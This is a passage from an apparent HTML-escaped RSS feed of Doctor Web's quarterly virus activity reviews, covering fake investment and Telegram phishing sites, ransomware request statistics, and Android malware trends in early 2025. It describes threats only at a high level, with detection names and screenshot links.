    new-generation financial solutions” from some platform called &lt;i&gt;LevelUPTrade&lt;/i&gt;:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/15_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/15_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    French users could become victims of malicious actors offering the chance to access the non-existent 
    &lt;i&gt;TraderAI&lt;/i&gt; automated trading software. With its help, potential victims allegedly had the opportunity to earn a hefty sum, starting from €3500:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/16_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/16_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    For Mexican citizens, scammers prepared an “intellectual trading system” called &lt;i&gt;QuantumIA&lt;/i&gt;. This is one of many variants of 
    the well-known pseudo-trading system known as &lt;i&gt;Quantum System&lt;/i&gt; or &lt;i&gt;QuantumAI&lt;/i&gt;, which supposedly allows automatic trading to take 
    place in financial markets using quantum computing and artificial intelligence technologies.
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/17_q2_2025_fraud_1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/17_q2_2025_fraud_1.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/17_q2_2025_fraud_2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/17_q2_2025_fraud_2.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    On another website, fraudsters, allegedly on behalf of a large bank, offered Mexican users some investment services. 
    Potential victims were promised that they could make 16,000 Mexican pesos within a short period of time after registering. 
    For this, they were asked to provide their personal data.
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/18_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/18_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    German users risked falling victim to the fake trading platform &lt;i&gt;Lucrosa Infinity&lt;/i&gt;. Its image has been exploited 
    in one form or another by cybercriminals for several years. On one fraudulent website, threat actors offered users 
    the opportunity to “start investing and open the door to financial independence”.
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/19_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/19_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Cybercriminals also offered Canadian users the opportunity to use “unique” services that allegedly provide high income through investments 
    and cryptocurrency trading. Among the uncovered fraudulent websites, for example, were those advertising “platforms” like &lt;i&gt;BitcoinFusionPro&lt;/i&gt; 
    and &lt;i&gt;BitcoinReaction&lt;/i&gt;. These supposedly allowed clients to make at least 1,000 Canadian dollars per day by investing “only” 350 dollars:
  &lt;/p&gt;
  &lt;div class="img img-two"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/20_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/20_q2_2025_fraud.2.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/21_q2_2025_fraud.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/21_q2_2025_fraud.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Users from Poland also encountered similar websites. On one of them, scammers promised their potential victims earnings from $950 to $2,200 
    a day with “the most advanced cryptocurrency management software in the world”:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/22_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/22_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Another website offered them €250 to invest and then earn €700 daily:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/23_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/23_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    One fraudulent website promised Polish users “the opportunity to work from home and make decent money” thanks to the automated system &lt;i&gt;Click Money&lt;/i&gt;. 
    With its help, people without trading experience could allegedly earn up to 64,000,000 Polish zlotys annually:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/24_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/24_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="notrecommend"&gt;
    &lt;a href="http://antifraud.drweb.com/dangerous_urls/" target="_blank"&gt;Find out more about Dr.Web non-recommended sites&lt;/a&gt;
  &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="formobile"&gt;
    &lt;h3&gt;Malicious and unwanted programs for mobile devices&lt;/h3&gt;
    &lt;p&gt;
        According to detection statistics collected by Dr.Web Security Space for mobile devices, in Q2 2025, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ad-displaying trojans were most commonly detected on protected devices. 
        Compared to the previous quarter, users encountered them somewhat less frequently. Next came adware 
        trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; family and 
        &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malicious fake programs; the activity of the former increased, while that of the latter decreased.
    &lt;/p&gt;
    &lt;p&gt;
        Mixed dynamics were also observed with banking trojans. For example, more attacks by representatives of the 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; family were recorded. At the same time, trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; and &lt;b&gt;Android.SpyMax&lt;/b&gt; 
        families were detected less often on protected devices.
    &lt;/p&gt;
    &lt;p&gt;
        In the second quarter, Doctor Web’s specialists 
        &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=15002" target="_blank"&gt;discovered&lt;/a&gt; the &lt;a href="https://vms.drweb.com/search/?q=Android.Clipper.31&amp;lng=en"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; 
        trojan in the firmware of a number of Android smartphone models. This malicious app was hidden in one of the &lt;i&gt;WhatsApp&lt;/i&gt; 
        messenger versions modified by attackers and was used to steal cryptocurrency from the owners of infected devices. 
        Moreover, our virus analysts &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=15006" target="_blank"&gt;uncovered&lt;/a&gt; 
        the &lt;a href="https://vms.drweb.com/search/?q=Android.Spy.1292.origin&amp;lng=en"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; malicious program. Cybercriminals embedded it into one version of Alpine Quest mapping 
        software and used it to spy on Russian military personnel.
    &lt;/p&gt;
    &lt;p&gt;
        Over the course of the last 3 months, dozens of threats have been detected on Google Play. 
        Among them were malicious fake apps from the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; 
        family and new unwanted ad-displaying software &lt;b&gt;Adware.Adpush.21912&lt;/b&gt;.
    &lt;/p&gt;
    &lt;p&gt;
        The following Q2 2025 events involving mobile malware are the most noteworthy:
    &lt;/p&gt;
    &lt;ul&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ad-displaying trojans were less active.&lt;/li&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; adware trojan activity increased.&lt;/li&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banking trojans were detected more often on protected devices, compared to the first quarter.&lt;/li&gt;
        &lt;li&gt;The number of &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; and &lt;b&gt;Android.SpyMax&lt;/b&gt; banking trojan attacks decreased.&lt;/li&gt;
        &lt;li&gt;A trojan designed to steal cryptocurrency was found in the firmware of several Android smartphone models.&lt;/li&gt;
        &lt;li&gt;A spyware trojan targeting Russian military personnel was discovered.&lt;/li&gt;
        &lt;li&gt;New threats emerged on Google Play.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;p&gt;
      To find out more about the security-threat landscape for mobile devices in Q2 2025, read our &lt;a href="" target="_blank"&gt;special overview&lt;/a&gt;.
    &lt;/p&gt;
&lt;/section&gt;</description></item><item><guid>https://news.drweb.com/show/?i=14992&amp;lng=en</guid><title>Doctor Web’s Q1 2025 virus activity review</title><link>https://news.drweb.com/show/?i=14992&amp;lng=en&amp;c=9</link><pubDate>Thu, 27 Mar 2025 00:00:00 GMT</pubDate><description>



&lt;p&gt;&lt;b&gt;March 27, 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;According to statistics collected by the Dr.Web anti-virus, the total number of threats detected in the first quarter of 2025 increased by 7.23%, compared to the fourth quarter of 2024. At the same time, the number of unique threats decreased by almost a third—27.59%. This suggests that, while increasing the intensity of their attacks, threat actors were using the same malicious and unwanted applications in them more often. Malicious scripts with different functionality, ad-displaying trojans, and adware apps were the most widespread threats.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;
    In email traffic, trojan droppers and downloaders, adware software, malicious scripts, and trojans designed to run various threats on attacked computers were most frequently detected.
  &lt;/p&gt;
  &lt;p&gt;
    Users whose files were affected by encoder trojans had mostly encountered 
    &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.35209&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt;, and &lt;b&gt;Trojan.Encoder.35067&lt;/b&gt;.
  &lt;/p&gt;
  &lt;p&gt;
    In January, Doctor Web’s virus laboratory 
    &lt;a href="https://news.drweb.com/show/?i=14976&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;uncovered&lt;/a&gt; 
    an active Monero cryptocurrency mining campaign using many different trojans. To conceal some of them, threat actors utilized steganography, 
    a technique that allows some data to be hidden within other data—for example, inside images.
  &lt;/p&gt;
  &lt;p&gt;
    At the same time, over the course of the first quarter, our Internet analysts detected an increase in the number of fraudulent websites aimed at stealing Telegram messenger user accounts. 
  &lt;/p&gt;
  &lt;p&gt;
    In the mobile threats department, Doctor Web’s specialists observed increased activity on the part of adware trojans and some 
    banking trojans used to target the Android OS. In addition, they uncovered dozens of new malicious apps on Google Play.
  &lt;/p&gt;
  &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
    &lt;h4 class="white alignCenter"&gt;Principal trends in Q1 2025&lt;/h4&gt;
    &lt;ul&gt;
      &lt;li&gt;Threats were detected on protected devices in increasing numbers.&lt;/li&gt;
      &lt;li&gt;The quantity of unique threats used in attacks decreased.&lt;/li&gt;
      &lt;li&gt;Phishing sites designed to steal Telegram accounts became more prevalent.&lt;/li&gt;
      &lt;li&gt;Several widespread ad-displaying and banking trojan families, used to target the Android operating system, heightened their activity.&lt;/li&gt;
      &lt;li&gt;New malware emerged on Google Play.&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
  &lt;h2 class="alignCenter"&gt;According to Doctor Web’s statistics service&lt;/h2&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/01_stat_q1_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/01_stat_q1_2025_en.png" alt="stat_2025_Q1"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;The most common threats in Q1 2025:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A malicious script that, in an infinite loop, searches for windows containing the text &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt;, and &lt;span class="string"&gt;розробника&lt;/span&gt; and sends them an Escape key press event, forcibly closing them.&lt;/dd&gt; 
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Adware that often serves as an intermediary installer of pirated software.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4242&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for malicious components of the WinSafe browser extension. These components are JavaScript files that display intrusive ads in browsers.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen30.53926&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name of an Electron framework host process modified by threat actors. It mimics a Steam application component (Steam Client WebHelper) and loads a JavaScript backdoor.&lt;/dd&gt;
  &lt;/dl&gt;
  &lt;h3 class="alignCenter"&gt;Statistics for malware discovered in email traffic&lt;/h3&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/02_mail_traffic_q1_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/02_mail_traffic_q1_2025_en.png" alt="mail_traffic_2025_Q1"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Inject&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A family of malicious JavaScripts that inject a malicious script into the HTML code of webpages.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AVKill.63950&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;This is a dropper that installs the &lt;b&gt;JS.BackDoor.42&lt;/b&gt; backdoor on computers running the Windows operating system.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Inject5.13806&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A malicious program for Windows-based computers that was created using the AutoIt scripting language. It launches several system processes and injects the &lt;b&gt;Trojan.Fbng&lt;/b&gt; spyware trojan into them. The attackers can use the latter as banking malware and for other purposes.&lt;/dd&gt;
  &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="encruptor"&gt;
  &lt;h2 class="alignCenter"&gt;Encryption ransomware&lt;/h2&gt;
  &lt;p&gt;
    In Q1 2025, the number of requests made to decrypt files affected by encoder trojans decreased by 9.34%, compared to Q4 2024.
  &lt;/p&gt;
  &lt;p&gt;
    The dynamics of the decryption requests received by Doctor Web’s technical support service:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/03_encoder_requests_q1_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/03_encoder_requests_q1_2025_en.png" alt="encoder_stat_2025_Q1"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;The most common encoders of Q1 2025:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 11.89% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.35209&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 5.95% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; — 3.57% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.38200&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.38200&lt;/b&gt;&lt;/a&gt; — 2.38% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.37369&lt;/b&gt; — 1.98% of user requests&lt;/li&gt;
  &lt;/ul&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="netfraud"&gt;
  &lt;h2 class="alignCenter"&gt;Network fraud&lt;/h2&gt;
  &lt;p&gt;
    In Q1 2025, Doctor Web’s Internet analysts observed the emergence of many new phishing websites designed 
    to steal Telegram messenger user accounts. Among the most common variants were fake login pages and support 
    pages that informed users about alleged problems due to some violation of the terms of service. 
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/04_scam_telegram_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/04_scam_telegram_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/05_scam_telegram_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/05_scam_telegram_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Fake sites of online stores were widespread once again. On these, cybercriminals asked potential victims to log in to their accounts.
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/06_scam_onlinestore_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/06_scam_onlinestore_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
    A phishing authorization form on a fake website of one Russian online store
  &lt;/em&gt;&lt;/p&gt;
  &lt;p&gt;
    Our specialists continued detecting fraudulent sites with all sorts of “great offers”, such as quick or easy ways to make money; 
    others were about receiving certain gifts, participating in promotions, etc. One of the schemes, for instance, targeted residents 
    of Great Britain, offering them the chance to obtain “limited edition” transportation cards, which were supposedly dedicated to the 
    anniversaries of various carriers and would allow them to use public transport services free of charge for a long period of time.
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/07_scam_transportcard_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/07_scam_transportcard_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/08_scam_transportcard_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/08_scam_transportcard_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
    Fraudulent sites offering the chance to obtain “special” First Essex and Oyster transportation cards that allow public transport services to be used for free
  &lt;/em&gt;&lt;/p&gt;
  &lt;p&gt;
    Users had to answer several questions and then play a game by opening virtual gift boxes (the “winning” box in such scenarios is hardcoded). 
    After “winning”, users had to provide personal information and pay £2 to “receive” the promised card. As a result, the victims’ personal 
    information and money ended up in the hands of threat actors.
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/09_transport_gift_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/09_transport_gift_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/10_transport_gift_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/10_transport_gift_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
    A potential victim has allegedly obtained a card successfully from one of the game boxes, and in order to receive it, they must provide personal data and also pay £2
  &lt;/em&gt;&lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/11_transportcard_pay_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/11_transportcard_pay_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
    A form for entering bank card details to pay for a non-existent promotional transportation card
  &lt;/em&gt;&lt;/p&gt;
  &lt;p&gt;
    Fraudsters continue luring potential victims with all sorts of trading platforms that have “unique” algorithms, including 
    ones that are supposedly based on artificial intelligence (AI) technologies. At the same time, cybercriminals exploit the 
    names of famous people and hide behind real companies and services, claiming a connection with them. One 
    popular scenario is based on claims that users can make money with the help of certain specialized services from Telegram, 
    WhatsApp, and other companies.
  &lt;/p&gt;
  &lt;p&gt;
    Some of these fraudulent sites were advertising various AI platforms, such as Telegram AI and WHATSAPP AI, which allegedly 
    could help users make at least €14,000 per month, thanks to an “automated trading system”:
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/12_scam_telegramai_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/12_scam_telegramai_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/13_scam_whatsappai_q1_2025.PNG" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/13_scam_whatsappai_q1_2025.PNG" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Other variants exploited the theme of trading bots, which are commonly passed off as instruments created by the messengers’ owners themselves. 
    One website, for instance, promised that “Pavel Durov’s bot” Telegram.AI would allow users to earn €2,500+ monthly; and another one offered the 
    option to use the WhatsApp Bot, supposedly created by Mark Zuckerberg, to make up to €500 per day.
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/14_scam_telegrambot_q1_2025.PNG" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/14_scam_telegrambot_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/15_scam_whatsapbot_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/15_scam_whatsapbot_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Another scam website offered users the option to register on a “Telegram platform” that allegedly runs directly from a smartphone browser, 
    automatically trades shares of global companies, and earns €10,000 per month:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/16_scam_telegram_platform_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/16_scam_telegram_platform_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    One website promised “every Europe resident” an income starting at €5,000 per month with the help of certain AI-based algorithms from the WhatsApp Company:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/17_scam_whatsapp_platform_q1_2025__new.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/17_scam_whatsapp_platform_q1_2025__new.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Scam platform “The wealth formula” (“Formule Bohatstvi” in Czech), with its fake AI-based trading system, is a popular variation of this fraudulent scheme. 
    It supposedly makes trades in a split second by analyzing huge amounts of data. Different sites of this non-existent system invite visitors to watch an 
    informational video and register an account for consultations in the “anti-crisis solutions office”. The fraudsters are mainly targeting Europeans—Czech 
    users in particular—who are promised an income of €1,000 per day “for life”. To access the system, potential victims are required to make a minimum deposit of €250.
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/18_scam_formule_bohatstvi_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/18_scam_formule_bohatstvi_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/19_scam_formule_bohatstvi_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/19_scam_formule_bohatstvi_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Other similar scenarios, such as generating income using various specialized software, also remain popular. 
    One such website invited Czech users to make thousands of crowns per day with “the world’s most intelligent cryptographic software”:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/20_scam_cz_money_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/20_scam_cz_money_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Another scam Internet portal promised earnings of over 4.7 million crowns monthly using certain trading software known as “10K EVERY DAY APP”:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
